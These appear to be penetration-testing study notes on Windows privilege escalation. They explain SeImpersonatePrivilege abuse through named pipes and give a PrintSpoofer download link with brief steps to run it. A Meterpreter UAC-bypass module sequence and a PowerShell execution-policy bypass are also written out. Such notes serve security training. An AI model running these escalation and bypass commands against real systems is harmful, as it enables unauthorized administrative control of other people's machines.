9. Using Exploits

• Another way of performing privilege escalations is by exploiting vulnerabilities
• There are several kinds:
  • Application running by a higher privileged user
  • Windows Kernel
    • Can easily crash the system
  • Windows Privileges
    • Users with SeImpersonatePrivilege are assigned specific privileges by leveraging a token in a specific context, which can be abused.
    • This most often occurs when breaching the account of a service such as a web server, and not standard users, which may run as: LocalService, LocalSystem, NetworkService, or ApplicationPoolIdentity.
    • Others privileges that can be abused include: SeBackupPrivilege, SeAssignPrimaryToken, SeLoadDriver, and SeDebug.

Named Pipes:

• A method for two unrelated processes to share and transfer data with each other.
• A named pipe server creates a named pipe to which a named pipe client can connect. The server and client does not have to reside on the same system.
• Once a client connects to a named pipe, the server can leverage SeImpersonatePrivilege to impersonate this client after capturing the authentication from the connection process.
• To abuse it we need: A privileged process to connect to a controlled named pipe with SeImpersonatePrivilege.
• Example is "PrintSpoofer" which makes NT AUTHORITY connect to a controlled named pipe for command execution.
• Printspoofer: https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

To exploit:

1. Make sure SeImpersonatePrivilege is turned on for your current user with:

whoami /priv

2. Get the script from your computer.
3. Execute it and win!

Other exploits good to know:
https://jlajara.gitlab.io/Potatoes_Windows_Privesc

Meterpreter UAC bypass:

• Review the integrity level of current process:

powershell -ep bypass
Import-Module NtObjectManager
Get-NtTokenIntegrityLevel

• In meterpreter:

use exploit/windows/local/bypassuac_sdclt
set session <id>
set LHOST <localhost>
run